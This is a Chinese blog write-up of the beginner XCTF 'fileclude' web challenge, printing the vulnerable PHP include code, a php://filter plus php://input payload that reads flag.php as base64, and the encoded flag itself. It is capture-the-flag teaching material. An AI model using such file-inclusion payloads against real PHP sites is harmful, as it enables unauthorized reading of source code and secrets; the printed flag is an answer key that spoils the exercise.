攻防世界web新手fileclude

最新推荐文章于 2024-04-21 11:17:00 发布
最新推荐文章于 2024-04-21 11:17:00 发布
阅读量1k 收藏 2
点赞数 2
分类专栏: 攻防世界 WEB刷题记录 文章标签: php 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yuanxu8877/article/details/127622885
版权

XCTF - fileclude

题目编号GFSJ1010

知识点

本题是典型的文件包含,主要知识点为php://input的使用

源码解析

WRONG WAY! <?php
//包含flag.php
include("flag.php");
//显示源码
highlight_file(__FILE__);
if(isset($_GET["file1"]) && isset($_GET["file2"]))
{
    $file1 = $_GET["file1"];
    $file2 = $_GET["file2"];
    //file1和file2变量不为空
    if(!empty($file1) && !empty($file2))
    {
    //file2的文件内容为hello ctf
        if(file_get_contents($file2) === "hello ctf")
        {
        //包含file1
            include($file1);
        }
    }
    else
        die("NONONO");
}

解题思路

通过源码分析,可以得出本题需要两个GET变量file1和file2。file1最典型的文件包含,可以用php:filter进行php源码的读取。file2也比较简单直接赋值为hello ctf即可。
payload如下:?file1=php://filter/convert.base64-encode/resource=flag.php&file2=hello ctf,但是运用如上payload,发现题目报错了,很明显不能直接输入file2的内容,想办法绕过即可

php://input

php://input可以访问请求的原始数据的只读流,将post请求的数据当作php代码执行。当传入的参数作为文件名打开时,可以将参数设为php://input,同时post想设置的文件内容,php执行时会将post内容当作文件内容。从而导致任意代码执行。
本题中,我们就可以运用他的后面的特性,post想设置的文件内容,php执行时会将post内容当作文件内容,我们可以用php://input,post一个hello ctf即可。payload如下?file1=php://filter/convert.base64-encode/resource=flag.php&file2=php://input post:hello ctf

我们可以看到flag.php的内容base64编码已经显示出来了,解码可获得flag

 PD9waHAKZWNobyAiV1JPTkcgV0FZISI7Ci8vICRmbGFnID0gY3liZXJwZWFjZXs4NjEzNTRjMGQ4Y2Y0MjM4YTI5OWVhMjU1MjM3MTMwNX0=
sean7777777
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
【网络安全 | CTF】攻防世界 fileclude 解题详析(php伪协议)
等风来
07-31 4279
代码功能:检查通过GET请求传递的两个参数"file1"和"file2"。如果这两个参数都存在且非空,它将读取"file2"文件的内容,如果内容等于"hello ctf",则会执行"file1"文件。对于file1,我们可以使用 convert.base64-encode 过滤器来读取位于 flag.php 文件中的内容,并将其转换为 base64 编码的形式。php://input 是一个 PHP 的内置流(stream)封装器,用于从请求的正文(body)中获取原始的输入数据。
PAT甲级所有题解代码
02-03
这里包含了179道PAT甲级的代码AC题解,供有需要通过PAT考试的同学下载学习使用。
攻防世界(CTF)~web-fileinclude
最新发布
m0_75030189的博客
04-21 480
本题主要涉及到php伪协议和代码审计,如果文章有错误希望及时和小白我联系进行更改! 加油,又是刷题的一天!
2021-06-24CTF-攻防世界-WEB新手练习区(12题入门题)
u258710的博客
06-24 2493
CTF-攻防世界-WEB新手练习区(12题入门题)01-view_source02-robots03-backup04-cookie05-disabled_button06-weak_auth07-simple_php08-get_post09-xff_referer10-webshell11-command_execution12-simple_js 01-view_source 题目描述:X老师让小宁同学查看一个网页的源代码,但小宁同学发现鼠标右键好像不管用了。 题目提示查看网页源代码,但鼠标右键不管用
CTF解题-Bugku_Web_WriteUp (上)
道阻且长,行则将至。
08-16 8695
BugkuCTF平台是免费的CTF训练平台,题目数量多网上解析全面对新手入门友好。 为了划水“强网杯”练习一下,先从Web部分下手…… N0.1 Web2 1、访问靶场链接,花里胡哨: 2、入门题,直接查看搜索源码: 3、解决: No.2 计算器 额,这题……没啥好所说的,原先限制前端字段输入长度为1,修改前端字段长度的限制即可: No.3 Web$_GET 1、看看解题链接: 2、看到这没啥好说的……该提示的都提示了,直接获取 flag: No.4 Web$_POST 1、看看解题链接:
Web安全CTF 题初级试练
热门推荐
土豆回锅的博客
01-19 3万+
最近在整理一些CTF题,觉得很有意思,觉得有必要一下!CTF对题目说明很重要,请务必重视! 1.Robot 熟悉web的人,看到题目应该想起robots协议,也被称为爬虫协议、机器人协议,网站通过robots协议告诉搜索引擎,哪些页面可以抓取,哪些页面不能抓取。 当一个网页爬虫爬去站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定
攻防世界————fileclude(内含php伪协议菜鸟讲解)
weixin_62281892的博客
09-28 3991
文件包含以及涉及到的php伪协议
攻防世界WEB练习-fileinclude
不知名白帽的博客
08-31 6685
攻防世界WEB练习-fileinclude
攻防世界Wire1杂项
11-20
攻防世界Wire1杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127951997
攻防世界流量分析2杂项
11-20
攻防世界流量分析2杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127953659
攻防世界杂项m0-01
11-13
攻防世界杂项m0_01,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127836871
攻防世界running
11-15
攻防世界running杂项,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127861757
攻防世界Fakezip杂项
11-20
攻防世界Fakezip杂项,misc。 此题详细解题博客:https://danbaku.blog.csdn.net/article/details/127952541
fileinclude (攻防世界web
qq_53099119的博客
10-01 1443
接下来构造payload,使用filter伪协议来读取flag.php的源码: payload: language=php://filter/convert.base64-encode/resource=/var/www/html/flag 注意,由于在源码分析中,对lan最后拼接了“.php”,因此在payload中flag后不用加。 执行后即可获得flag的base64编码。
Web安全攻防世界02 fileclude(ctf)
weixin_42789937的博客
11-27 1724
攻防世界02,Web安全题目fileclude(ctf),文件包含入门题目,参考大佬们的WP有所补充,内容对小白友好~
攻防世界-fileclude
m0_49025459的博客
12-28 1163
访问题目场景阅读php代码构造payload,这里文件包含的file1使用的是php伪函数进行传输的,file2使用的data://text/plain进行内容的传入。
攻防世界WEB练习-fileclude
墨鱼菜鸡
09-10 3736
目录 题目场景 分析代码 解决思路 ​编辑 base64解码 找到flag 题目场景 分析代码 <?php include("flag.php"); highlight_file(__FILE__); if(isset($_GET["file1"])&&isset($_GET["file2"])) { ...
攻防世界fileclude
m0_73303597的博客
11-07 1748
自用
攻防世界 easyphp
09-11
EasyPHP是一个用于Windows操作系统的开发环境,它集成了Apache服务器、MySQL数据库和PHP解释器,使得搭建和管理网站变得更加简单。在EasyPHP中,攻防世界是一个基于CTF(Capture The Flag)赛制的在线平台,旨在提供网络安全学习和竞赛的机会。 攻防世界平台上有各种不同的题目和挑战,涵盖了网络安全的多个方面,包括但不限于Web漏洞、系统漏洞、密码学等。参与者需要通过解决这些挑战来学习和提高自己的网络安全技能。同时,攻防世界也提供了一些教程和文章,帮助新手入门并引导他们深入理解攻击和防御的原理。 对于初学者来说,攻防世界的easyphp环境可以作为一个很好的起点,因为它提供了一个集成的开发环境,使得学习和实践变得更加方便。通过解决平台上的题目和挑战,初学者可以逐渐熟悉常见的安全漏洞和攻击技术,并学会如何进行相应的防御措施。 希望以上信息对你有所帮助!如果你有任何其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值